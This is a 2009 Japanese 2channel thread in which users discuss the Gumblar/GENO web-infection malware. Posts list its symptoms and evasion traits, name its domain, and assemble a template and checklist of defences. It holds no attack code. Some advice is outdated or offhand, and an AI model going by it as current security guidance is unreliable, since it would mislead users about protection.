夏過ぎに7にアップグレードできるVISTA搭載機は出るとは思うが、 この馬鹿は懲りずに中古買いそうだ。
>>843 >たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
Windows Meは車検切れ。
製造のMicrosoftしか車検はできず
そのMicrosoftがWindows Meはもう車検しませんと言っている。
まあPCは特殊分野だからねえ F1マシンに例えると今期のマシンが最高速度300km/hだったのが来期は600km/h その翌年には1200km/hになってるようなもの ちょっとおかしな世界なのよマジで
868 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 11:04:51
この程度ならVista UACを使うまでもなく、ルーター+Win2k+で問題ないでしょ。
872 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 11:21:05
>>843 世界が違うんだよ。家電と。解らないならパソコン辞めろ
>>870 そうだな
Vistaは誰でも簡単にセキュリティが保てるようにしただけの物だから上級者なら2000でも十分だな
ただ2000のアップデートももうじき終わるのが痛いな
>>847 おいおいw
ある日莫大な請求がいってもしらんぞ
XPのサポートっていつまで続くの?
2014年まで
Windows2000やXPでセキュリティを保つよりVista以上のOSに ルータ、アンチウイルス、PFWなどを入れて各種の最新のパッチ入れたほうが楽だろな 俺はWindows7に期待している
スレの伸び方が怖いお。 ノートンとかが対応しないのは横柄? それとも、まだ全然脅威でない、ってな見解?
VISTAはユーザーにつかいにくいとフルボッコ状態だったけど ウイルスからフルボッコされないって皮肉なもんだね
まあ、それだけシェアが少なくて相手にすらされてない現状なんじゃね? シェアがVISTA系のみならUAC回避の方向で作られただろうしさ。
>>880 Macと同じだろ。
不人気だからウィルス作者にも相手にされない。
もしVistaのシェアが激増すれば攻撃されまくるだろうけどね。
Vistaは表面上、セキュリティ厳重に見えちゃうから、
もし攻撃対象になったら素人どもが阿鼻叫喚だと思う。
XP Pro SP2 Firefox3.0.10 です WindowsUpdate PDFリーダーを最新にする AdobeFlashを最新にする ウイルスバスター2008 NoScript これだけじゃ防げないの?
OSは最新を使っていればセキュリティはまちがいないな
>>883 OSに関してはMicrosoftUpdateのほうでおねがいします
なんでSP2なのかわからんけどSP3を当ててね
>>883 とりあえず今のところは防げるんじゃないの
しかし、優秀なGENOウイルスメンバーは、
セキュリティの盲点を新たに突いてやってくるから恐いんだよ
>>859 それだけじゃセーフとはいえない
>>879 横柄とかそんなアホな問題じゃなくて
中身が変わりすぎて対応しきれないだけ
889 :
883 :2009/05/15(金) 12:16:00
>>885-887 ありがとう、油断はできないんだねw
>OSに関してはMicrosoftUpdate
WindowsUpdateとなんか違うんですか?
>なんでSP2なのかわからんけど
SP3入れて不具合っての良く見かけたもんで躊躇してますw
w
>>889 SP3に関して、今はあら捜しが好きな奴が大々的に言ってるだけ。
まあ、SP2出たばっかりの頃を経験してるから、アップデート躊躇する気持ちもわかるけどね。
PayPalのお金がなくなってた! こいつのせい!?
>>893 俺も戸棚に置いといた茶菓子が無くなってた!
こいつのせいに違いない!
>>891 某メーカーのルータはフィルタリングしても効いてないやつあるから注意な
メインはfirefoxでIEはめったに使わないんだけど IE6のままだと心配?7か8にしたほうがいいのかな?
>>895 おい!
さっきまで腹減ってたのになんだか腹一杯になってるぞ!
お前のせいか!
>>897 IEは他のウイルスにも狙われてるから危険
>>900 やっぱりIE6じゃまずいか・・・7入れてみるよ
updateとかでたまに使う程度だけど
>>901 firefoxにieのプラグインを入れたらいい
もし個人HPとか作成していたらそれもやばいのか
>>902 結局それieエンジンになるから同じことじゃね?
906 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 12:58:30
大手企業さえああいうことになってる訳だし〜
ちょっとまてよ… firefoxにieのレタリングをアドオンをすれば 限りなくieの脆弱性をもつfirefoxになるのか?どうだろ
アドオン入れてたかもしれん 削除しとこー
IEかどうかを調べているから純正IEよりはマシじゃね
もうね危ないからネットのケーブルはずしちゃお。 これで気兼ね無くネットができ……アレ?
深刻なはずなのに、たまに和むレスがあるなwww
ソースみりゃ
>>917 www
あるわけないだろw
直接聞いてみたら?
>>917 まじかよ。
危険もなにもやばすぎるだろ…。
ウイルス入りのページばらまかれたらたまらないな。
制作会社のソースを確認したほうがいいぞ。
ありがぞうございます ソースというのはどこで見ればいいのでしょうか?
www マジレスすると今すぐ電話して聞け
JAVA切っちゃってみんな絶対動画サイト見ないの? 俺は我慢できんからつべとニコ許可しちまった
>>925 JavaじゃなくてJavaScriptのほうね
>>923 ありがとう、Office入ってないけど考えてみます
929 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 13:22:43
>>925 同じくw
加えてyahooとgoogleも許可してるけどまずいのか?
JavaScriptは切ってないな リーダーの方をアンインストした 又インストすれば良いし
感染するとどんな挙動になるんです?
もうやだ…検索するのさえ怖い
936 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 13:32:59
類をみない凶悪さだ思うんだが、思ったより騒がれていないな。 もっと取り上げられてもいいはず。 IE系で無自覚で感染しているやつが多そうで怖いよ。
大体解決したね もう次スレいらないね
久しぶりに見たわそれ
次スレそろそろ立てるシーズンだけど テンプレ考えようか
>>937 大きくニュースで取り上げられたら普通の人も怖さに気付く
パスワード盗まれるだけで PCに挙動がおかしくなったりしないの? PC異常きたさずにパスだけ抜かれるなら 怖いな
解決してねーだろw ここのやつらは解決してるだろうが。
>>945 どこをどう読んだらそうなる?
IE系がターゲットにされてるんだよ
IE以外も油断はできない早さで進化してるけどな
挙動おかしくなるて書いてたよ
もうイヤだ。 こんなインターネッツ。
再起動でけた 小林製薬のHP見たことあるからびびってたんですよ
ふっつーにOperaでも感染しそうになったよ Adobe ReaderのJavaScriptを切っていたから助かったみたいだけど もちろんUA偽装なんかしてないぞ
>>943 ・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
これ天婦羅に揚げた方がいいんじゃないか?
また新種きてるってこと? そろそろ次スレ準備お願いします。
955 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 13:47:11
>>941 感染を疑った人の報告をテンプレで統一化するのは?
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
こんな感じにすれば診断する側も
見やすい気がするお
【解決】GENOウイルススレ 4【してません】
>>953 これとあテンプレ候補よろ〜
立ててくるから
とりあえずそんなもんかな? よろしくー。 一般人が騒ぎ出す頃が一番やばそうだね。
959 :
936 :2009/05/15(金) 13:49:06
>>959 ありがと
これも追加してもらってもいいかな?
製薬会社のメールマガジン登録してるんだけど これも開いたら危ないのかな…
とりあえず残りのレスはテンプレに入れてほしいものを書き出そう
まず最新バージョンにする Adobe Flash Player 10.0.22.87 Adobe Reader 9.1.1(5/12アップデート) AdobeReader設定で、 「PDFをブラウザに表示」「Adobe Javascripを使用」 っていうところのチェックボックスを外す ほとんどのAdobeReaderプラグインの脆弱性を狙ったウイルスにやられなくなる -- これはいれたほうがいいかな?
・IEを使用しない ・FirefoxならNoScriptを入れる これも最初に入れてくれ
テンプレに、So-netの記事と小林製薬他の「まともな告知をしている所」のリンク張っといたら? 説明するのに楽だろ。
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
【OS】 Windows Me 【使用セキュリティソフト】 avast! 4.8 Home Edition 【疑った理由】 106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため 【症状】 avastが反応し、警告音と共に「JS:Redirector-H2(トロイの木馬)を検出した」と表示されたので、 驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明 【確認手段】 「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック後、再起動 【結果】 ウイルスの検出無し、再起動は正常、CPU使用率も正常、MS-DOSプロンプト、regedit起動可能
1.Adobe Flash Player のアップデート 2.Adobe Acrobat Reader のアップデート 3.NoScriptの導入(Firefoxの導入) 4.Adobe Acrobat Readerの JavaScript OFF 5.危険IPのブロック
ネットがリアルに浸入してきたんだ!
975 :
名無しさん@お腹いっぱい。 :2009/05/15(金) 14:06:51
>>XP / 2000 の方は sqlsodbc.chm をチェックしてください。 この sqlsodbc.chm ってVISTAにもあるがスルーでいいのか? 格納されてる場所は違うけども
テンプレ完成したらまとめwikiに貼っておこうよ 次スレまでに状況変わるにしても叩き台にはなるし
おつー ひととりOKかな? Meの人はあきらめてくださいw
一応大体のものは貼ってきた
被った人すみません。
>>966
>>980 すまん入れていなかったので今テンプレ続きにした
プリフェッチ機能を無効 でググったらIEもできるみたいだけど、やったほうがいいんかね
落ち着いたみたいなので質問 感染した場合、ワクチンやM$のパッチじゃ回復できないの?
>>985 感染してたら、今のところ
クリーンインストール&各種PASS変更 推奨
gumblar.cn の検索結果 約 84,200 件中 1 - 10 件目 (0.10 秒)
>>968 javaは見つかったが
「PDFをブラウザに表示」の項目がどこかわからない
>>989 確かインターネットの下。
俺はreaderいれてないから確認できないすまん
>>986 感染しているかどうかは、どうやって判定すれば良いの?
環境設定→インターネット→Webブラウザオプション
検出してくれるセキュリティソフトも追加しないか? 付け焼き刃だけど ・Avast! ・Kaspersky
>>994 こんな感じでいいのかな?
現時点で確認出来る対策ソフト
・Avast!
・Kaspersky
・ウイルスバスター2009 もかな ソースネクストとかのはやばそうだなw
>>991 sqlsodbc.chmのファイルサイズとMD5をチェック
どんどん亜種が出てるみたいから対策ソフトも追いついてない
>>995 ※亜種の進化が速いため過信は禁物
とか書いたほうがいいかも
アンラボも対応済みらしいけど・
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。